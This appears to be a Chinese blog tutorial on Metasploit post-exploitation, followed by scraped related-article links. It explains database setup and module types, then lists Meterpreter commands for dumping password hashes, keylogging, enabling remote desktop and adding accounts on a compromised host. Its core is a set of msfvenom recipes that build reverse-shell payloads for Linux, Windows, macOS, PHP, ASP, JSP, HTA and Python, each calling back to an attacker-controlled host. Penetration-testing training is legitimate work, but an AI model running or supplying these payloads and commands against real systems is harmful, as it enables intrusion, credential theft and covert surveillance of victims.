[后渗透]Metasploit使用基础
0x00 简介
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
0x01 配置MSF的数据库
首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度
1.1 进入msf
查询数据库连接情况:发现默认情况下并未连接数据库
$msf> db_status
1.2 配置数据库
$service postgres enable
$service postgres start
$msfdb init
1.3 连接密码
看到上面的配置文件的提示,就可以通过文件地址,查看连接密码:
$cat /usr/share/metasploit-framework/config/database.yml
1.4 查询
知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令:
1.5 连接
再用用账号密码去连,最后db_stause
查询下状态,发现连接正常
0x02 MSF模块
MSF的命名规则:模块/系统/服务/名称
MSF的模块,也就是我们看到的众多利用模块最前面的分类,主要有以下6个模块
- exploits(漏洞攻击模块列表,入侵式)
- payloads(漏洞负载模块,入侵要做什么)
- auxiliary(辅助模块,一般是没有攻击载荷的漏洞攻击)
- encoders(编码器模块 用于msfvenom -e or msf执行时也能用的 指的是shellcode的编码)
- nops(无操作生成器模块)
- post(开发模块)
0x03 使用流程及常用指令
3.1 使用流程
1.search name(查询相关漏洞编号)
2.use exploits(使用模块)
3.show options(攻击前设置变量)
4.set payload(设置payload)
5.exploit/run(运行)
3.2 常用指令
unset 清空已经设置好的参数内容
sessions -u <id> 将sission ID的command shell提升至meterpreter
0x04 MSF的Payload
4.1 Payload的类型
_find_tag:在一个已建立的连接上
_reverse_tcp:反向连接到攻击者主机
bind_tcp:监听一个tcp连接
reverse_http:通过HTTP隧道反向连接
4.2 run的参数
-e <opt> 要使用的有效载荷编码器。如果没有指定,则使用编码器。
-f 强制开发漏洞,而不考虑极小值的大小。
-h 帮助
-j 后台运行。。
-n <opt> 使用NOP发生器。如果没有指定,则使用NOP。
-o <opt> 在VAR= VALL格式中的逗号分隔选项列表。
-p <opt> 使用的有效载荷。如果没有指定,则使用有效载荷。
-t <opt> 要使用的目标索引或名称。如果没有指定,则使用目标。
-z 在成功开发后不与会话交互。
4.3 MSF会话指令
sessions 查看所有肉鸡列表
session -l 查看肉鸡在线列表
exploit 执行渗透攻击或模块来攻击目标。
sessions -i 1 打开建立的第一个会话
getuid 查看UID
sysinfo 查看攻击主机的系统信息
run hashdump dump目标主机的hash帐号信息,备份进行暴破
ps 查看目标主机进程
migrate 1576(pid) 切换自己为管理员,1576是管理员的进程ID
keyscan_start 开启健盘记录功能
keyscan_dump 查看健盘记录信息
keyscan_stop 停止健盘记录
run getgui -e 远程开启目标主机的远程桌面
run getgui -u cisco -p cisco 远程添加目标主机帐号密码
rdesktop 192.168.1.100 连接远程桌面
0x05 MSF生成木马
5.1 List payloads
msfvenom -l
5.2 系统型
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<攻击机IP> LPORT=<攻击机端口> -f psh-reflection -o payload.ps1
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f macho > shell.macho
5.3 网页型
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw > shell.jsp
HTA:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f hta-psh -o shell.hta
5.4 其他
Python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
0x06 MSF提权
参考博文:
Metasploit(MSF)的一些提权方法
Meterpreter提权详解
[后渗透]Metasploit使用基础的更多相关文章
- Meterpreter后渗透之信息收集
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...
- metasploit 渗透测试笔记(基础篇)
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅 ...
- Metasploit Framework(8)后渗透测试(一)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...
- 7.Metasploit后渗透
Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预 ...
- Metasploit简单使用——后渗透阶段
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- 20145320 《网络渗透》MSF基础应用
20145320 <网络渗透>MSF基础应用 1.实验后回答问题 exploit 攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击.主要分为主动攻击和被动攻击.像我们这次做的实 ...
- iOS macOS的后渗透利用工具:EggShell
EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提 ...
- 后渗透之meterpreter使用攻略
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门 ...
随机推荐
- CentOS -- 新建用户并使能密钥登录
目录 1. 新建用户 2. 为新用户授权 2.1. 方法一:把新用户添加到wheel用户组中 2.2. 方法二:把新用户添加到sudoers列表中 3. 新用户使能 SSH 密钥登录 4. 其它 4. ...
- 2019 超级老板APPjava面试笔试题 (含面试题解析)
本人5年开发经验.18年年底开始跑路找工作,在互联网寒冬下成功拿到阿里巴巴.今日头条.超级老板等公司offer,岗位是Java后端开发,因为发展原因最终选择去了超级老板,入职一年时间了,也成为了面 ...
- Oracle 逻辑存储结构
一.总述 逻辑存储结构是 Oracle 数据库存储结构的核心内容,对 Oracle 数据库的所有操作都会涉及逻辑存储结构.逻辑存储结构是从逻辑的角度分析数据库的组成,是对数据存储结构在逻辑概念上的划分 ...
- ipc$ 空连接 net use
常用命令 [xxx]表示的内容,需要根据自己的需求更改 //建立空连接 > net use \\127.0.0.1\ipc$ //删除连接 > net use \\127.0.0.1\ip ...
- 使用ABAP绘制可伸缩矢量图
Jerry去年的文章 动手使用ABAP Channel开发一些小工具,提升日常工作效率 里曾经介绍过一些用ABAP实现的可供娱乐的小程序,比如用古老的HPGL接口在SAPGUI里绘图: 关于如何用SA ...
- LeetCode刷题:Reverse Words in a String(翻转字符串中的单词)
题目 Given an input string, reverse the string word by word. For example, Given s = "the sky is b ...
- Ftp站点搭建的详细过程(包括指定用户登录)
最近接到要部署一个Ftp站点的一个任务,然后过程中有点小插曲踩了一些坑(指定用户登录,用户名和密码都是对的,输入了超级多遍,还是不行,登录不上,后面详细说明解决方案),特此记录一下.避免大家踩坑. 参 ...
- Kubernetes集群开启Firewall
关于端口的官方说明:https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/install-kubeadm/ k8s ...
- bat文件中运行python脚本方法
在脚本中使用start命令: @echo off start python xxx.py 注: start命令:启动单独的“命令提示符”窗口来运行指定程序或命令.如果在没有参数的情况下使用,start ...
- SQL注入原理-手工联合注入查询技术
实验报告记录 得到实验结果